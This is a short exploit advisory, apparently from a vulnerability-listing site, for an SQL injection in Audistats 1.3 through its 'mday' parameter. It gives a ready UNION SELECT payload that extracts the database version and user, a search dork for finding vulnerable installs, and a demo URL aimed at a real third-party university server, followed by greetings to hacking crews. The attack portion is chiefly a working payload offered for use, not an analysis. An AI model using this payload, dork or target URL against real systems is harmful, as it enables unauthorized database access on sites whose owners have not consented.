Audistats 1.3 remote SQL injection

2010.02.06
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################################################### # [~] Audistats SQL injection vulnerability - (mday) # [~] Author : kaMtiEz (kamzcrew@yahoo.com) # [~] Homepage : http://www.indonesiancoder.com # [~] Date : January 29, 2010 # # ################################################################################### [ Software Information ] [+] Vendor : http://adubus.free.fr/audistat/ [+] Download : http://adubus.free.fr/audistat/ [+] version : 1.3 or lower maybe also affected [+] Vulnerability : SQL injection [+] Dork : "Think iT" [+] Price : - [+] Location : INDONESIA - JOGJA ################################################################################## [ HERE WE GO .. LIVE FROM JOGJA CITY ] [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/?year=kaMtiEz&month=tukulesto&mday=[INDONESIANCODER] [ Exploit ] -666+union+all+select+@@version,user()-- [ Demo ] http://dirac.phys.ncku.edu.tw/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user()-- =========================================================================== [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13Z [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk,r3m1ck [ NOTE ] [+] Belajar Belajar Dan Belajar !! [+] Jack im commiinnggggggggggggggggggggggggggggggggg .. ^_^ [ QUOTE ] [+] we are not dead INDONESIANCODER stil r0x [+] nothing secure ..

References:

http://www.exploit-db.com/exploits/11334
http://secunia.com/advisories/38494
http://packetstormsecurity.org/1002-exploits/audistats-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top